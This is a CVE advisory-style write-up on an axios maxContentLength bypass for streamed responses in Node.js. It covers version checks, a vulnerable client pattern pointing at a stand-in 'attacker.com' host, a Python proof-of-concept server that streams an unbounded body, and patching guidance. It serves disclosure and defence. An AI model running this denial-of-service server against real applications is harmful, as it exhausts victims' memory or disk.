axios, maxContentLength Bypass, CVE-2026-42036 (Medium)


How the mentioned CVE works:

  1. Axios versions prior to 1.15.1 (1.x line) and 0.31.1 (0.x line) contain a vulnerability in the Node.js HTTP adapter (lib/adapters/http.js).
  2. The flaw is in the handling of requests made with the `responseType: 'stream'` option, which is used to process large responses without buffering them in memory.
  3. In the affected code, when `responseType` is set to 'stream', the adapter settles the request promise immediately and hands the raw response stream to the caller.
  4. The logic that enforces the `maxContentLength` limit is skipped entirely on this code path.
  5. `maxContentLength` is only enforced when Axios buffers the whole body itself, as with the default `'json'` or `'text'` response types, where the running byte count is compared against the limit as chunks arrive.
  6. Consequently, an application that sets a small `maxContentLength`, for example `1024` bytes, gets no protection from that limit as soon as it also sets `responseType: 'stream'`.
  7. An attacker who controls the responding server, or who can steer the application to one (for example through a user-supplied URL), can therefore return a response body of any size.
  8. The HTTP adapter accepts that body without any validation or truncation and passes it to the application.
  9. Neither the Content-Length header nor the actual number of bytes read is checked against the configured limit.
  10. The application, believing it is protected by `maxContentLength`, proceeds to read and process the unbounded stream.
  11. If the application collects the stream into memory (for example to parse it after download), this leads to memory exhaustion.
  12. If the application instead writes the stream to disk, the same response can exhaust the available storage.
  13. The weakness is classified as CWE-770 (Allocation of Resources Without Limits or Throttling).
  14. The resulting impact is a Denial of Service (DoS): uncontrolled resource consumption can crash the application or the host.
  15. The Proof of Concept (PoC) is a server returning a 2 MiB body and an Axios client requesting it with `responseType: 'stream'` and `maxContentLength: 1024`; the client receives the full 2 MiB.
  16. The control check, the same request with `responseType: 'text'`, is correctly rejected with a maxContentLength error, proving the bypass is specific to the stream handling logic.
  17. The vulnerable code path lives in the Node.js HTTP adapter; browser builds of Axios use the XHR and fetch adapters and do not share it, so the issue concerns Node.js applications that use Axios for streaming requests.
  18. The issue was fixed by adding an `enforceMaxContentLength` async generator to the stream branch, which wraps the response stream and tracks the cumulative content length as chunks are yielded.
  19. If the received data exceeds `maxContentLength`, the generator throws immediately and the underlying stream is destroyed, so no further bytes are read from the socket.
  20. With this patch the `maxContentLength` limit is enforced regardless of the `responseType` setting.

dailycve form:

Platform: `axios for Node.js`
Version: `<1.15.1, <0.31.1`
Vulnerability: `maxContentLength stream bypass`
Severity: `Medium (CVSS 5.3)`
Date: `2026-04-24`

Prediction: `Patch date same`

What Undercode Say:

Check the installed Axios version (the first command lists every copy in the dependency tree, including transitive ones):
npm list axios
Decide whether the resolved version is vulnerable: any 0.x release below 0.31.1, or any 1.x release below 1.15.1. A grep on the version string cannot compare versions correctly (it would, for example, treat 0.31.10 as unpatched and 1.15.0 as patched), so use the semver CLI from the `semver` npm package instead; it prints the version and exits 0 only if it falls inside the vulnerable range:
V=$(node -p "require('axios/package.json').version")
npx --yes semver -r "<0.31.1 || >=1.0.0 <1.15.1" "$V" && echo "axios $V is VULNERABLE to CVE-2026-42036"
// Vulnerable code pattern: the configured limit is silently ignored on the stream path
const axios = require('axios');

async function vulnerableFetch() {
  try {
    const response = await axios({
      method: 'get',
      url: 'http://attacker.com/large-payload', // attacker-controlled origin
      responseType: 'stream',                  // bypasses maxContentLength on affected versions
      maxContentLength: 1024                   // this limit is never checked for streams
    });
    // The server can now push an unbounded body into the application
    response.data.on('data', (chunk) => {
      // Processing or buffering each chunk leads to memory/disk exhaustion
    });
  } catch (error) {
    console.error('Error:', error.message);
  }
}

Exploit:

Simulate an attacker-controlled origin serving an unbounded stream.
This server never sends a Content-Length and keeps writing 1 MiB chunks until the client disconnects; point the vulnerable client at http://127.0.0.1:8080/ and watch its memory or disk usage grow.
python3 -c "
import http.server
import socketserver
import time

class StreamingHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        # No Content-Length: with HTTP/1.0 the body simply runs until the connection closes.
        try:
            while True:
                self.wfile.write(b'A' * 1024 * 1024)  # send 1 MiB chunks
                self.wfile.flush()
                time.sleep(0.1)
        except (BrokenPipeError, ConnectionResetError):
            pass  # client went away (or a patched client destroyed the stream)

socketserver.TCPServer.allow_reuse_address = True
with socketserver.TCPServer(('', 8080), StreamingHandler) as httpd:
    print('Serving unbounded stream at port 8080')
    httpd.serve_forever()
"

Protection from this CVE:

Immediate action: upgrade Axios to 1.15.1 (1.x line) or 0.31.1 (0.x line), or any later release.
If an immediate upgrade is impossible, avoid the `responseType: 'stream'` option and let Axios buffer the body, which is the code path where `maxContentLength` is enforced.
Where streaming is required, wrap the returned stream in a limiter that counts bytes as they arrive, destroys the stream and fails the request as soon as the threshold is exceeded, before any data is buffered in memory or written to disk.
A reverse proxy in front of the application does not help here, because in this attack the application is the HTTP client; if outbound requests already pass through an egress (forward) proxy, cap the upstream response size there as a defence in depth.

Impact:

Type: Denial of Service (DoS) / Unbounded resource consumption.
An attacker who controls the server the application fetches from, or who can point the application at such a server (for example through a user-supplied URL), can exhaust the client's memory with a single unbounded response.
If the application writes the stream to disk, the same response can fill the available storage and cause a system-wide outage.
The attack is remotely exploitable over HTTP with low complexity and requires no privileges or user interaction (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L, base score 5.3).
Applications that rely on `maxContentLength` as a security boundary while processing streamed Axios responses in Node.js are directly affected.


Sources:

Reported By: github.com
